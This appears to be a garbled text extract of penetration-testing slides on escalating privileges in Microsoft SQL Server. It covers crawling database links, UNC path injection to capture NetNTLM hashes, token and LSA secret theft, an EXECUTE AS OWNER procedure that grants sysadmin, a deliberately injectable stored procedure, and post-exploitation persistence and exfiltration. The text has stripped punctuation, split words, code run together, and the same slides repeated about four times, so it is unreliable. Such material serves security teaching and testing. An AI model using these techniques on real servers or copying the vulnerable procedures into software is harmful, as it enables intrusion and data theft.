HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
